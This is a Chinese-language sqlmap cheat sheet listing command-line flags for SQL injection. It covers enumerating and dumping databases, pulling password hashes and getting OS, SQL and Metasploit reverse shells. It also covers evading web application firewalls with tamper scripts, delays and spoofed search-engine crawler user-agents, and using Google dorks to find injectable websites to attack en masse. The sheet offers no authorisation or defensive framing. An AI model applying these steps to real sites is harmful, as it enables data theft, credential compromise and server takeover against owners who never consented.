sqlmap
GET参数:
-u 网址
--dbs:获取注入点的所有数据库
-D:指定数据库 --tables:获取指定的表
-T:表名 --columns:获取表的指定字段
-C:获取指定字段 --dump:把数据打印出来
POST注入:
先抓包,
注入点的位置打个*号
然后保存为txt文档
-r 指定的文档 --dbs:获取注入点的所有数据库 --level=3,注入级别默认为1,为三的话注入能力加强一点
--current-db:获取当前数据库
sqlmap获取shell:
--users:查看当前权限
--os-shell:获取shell
sqlmap自动选择:Y/N
--batch --smart
sqlmap绕过waf
绕过waf:--tamper
如果想要获取密码:--tamper space2mysqlblank.py(模块名) --passwords
模块就是脚本:其它脚本在sqlmap的tamper文件里面,可以根据waf的情况来进行脚本的选择
--delay=20,如果发包过快,可以选择延时一会,单位(毫秒)
sqlmap:智能自动注入
--batch --smart -a:智能选择Y/N并智能注入
(会把所有东西都跑出来)
--os-cmd="命令":(会自动执行该命令)
sqlmap:获取数据库的shell
如果操作系统的shell无法获取,则可以选择获取数据库的shell
--sql-shell
--os-pwn:如果提权不成功,可以使用该命令,会结合msf,反弹回来一个shell
sqlmap:自动搜索带注入点的网站
-g "inurl:php?id=1":用google语法来进行搜索带注入点的网站
-g "inurl:asp?id=1":带asp的网站
--delay:设置时间延迟(单位为s)
--random-agent:随机user-agent头
--user-agent="自定义头"
可以用搜索引擎的头,有些网站有waf可以利用搜索引擎的头进行白名单绕过
搜索引擎头:
Googlebot:Googlebot /2.1; +http://www.google.com/bot.html
Baiduspider:Baiduspider/2.0; +http://www.baidu.com/search/spider.html
bingbot:bingbot/2.0; +http://www.bing.com/bingbot.htm
360Spider:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/5 37.36; 360Spider
Sogou web spider:Sogou web spider/4.0(+http://www.sogou.com/docs/help/ webmasters.htm#07)
YisouSpider:Mozilla/5.0 (Windows NT 6.1; Win64 ; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36
YandexBot:YandexBot/3.0; +http://yandex.com/bots
DuckDuckGo:Mozilla/5.0 (Linux; Android 10) AppleWebK it/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.138 Mobile Safari/537.36 DuckDuckGo/5